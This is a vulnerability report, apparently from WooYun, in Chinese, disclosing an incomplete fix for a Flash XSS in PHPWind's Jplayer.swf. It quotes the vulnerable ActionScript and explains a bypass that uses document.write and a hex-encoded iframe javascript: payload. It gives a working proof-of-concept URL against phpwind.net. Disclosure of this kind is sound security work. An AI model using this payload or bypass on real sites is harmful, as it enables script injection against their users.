PHPWind flash xss 0day？

### 简要描述： 突然发现的，在乌云上一搜，是insight-labs提交了的一个，官方回复已经修复，但是修复不完整。 ### 详细说明： 在测试其他网站时，发现了这个flash文件，看了下代码， ``` ExternalInterface.call(this.jQuery, "jPlayerFlashEvent", arg0.type, this.extractStatusData(arg0.data)); ``` 搜索jquery： ``` this.jQuery = loaderInfo.parameters.jQuery + "('#" + loaderInfo.parameters.id + "').jPlayer"; ``` 显然没有过滤，并且可以控制。 在乌云上搜索了下看到了 [WooYun: PHPWind flash xss 0day [2]](http://www.wooyun.org/bugs/wooyun-2013-017733) 这个，试了poc是修复的，但是直接填写alert还是会弹出框框来，本来想是无法利用的，突然想到不用alert改用document.write,还有既然id也能控制，写上<iframe>，发现在页面上出现个框框，但是写<iframe src=javascript:alert(document.domain)>发现是不能执行的。 试着进行了下js编码，还真成功了。 ### 漏洞证明： ``` http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=document.write&id=\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e ``` 预览了下发现自动把一个反斜杠变为两个了。自己处理下吧。 [<img src="https://images.seebug.org/upload/201305/161724201021304edb87007ac059ef9cb511e67b.png" alt="QQ截图20130516172334.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/161724201021304edb87007ac059ef9cb511e67b.png)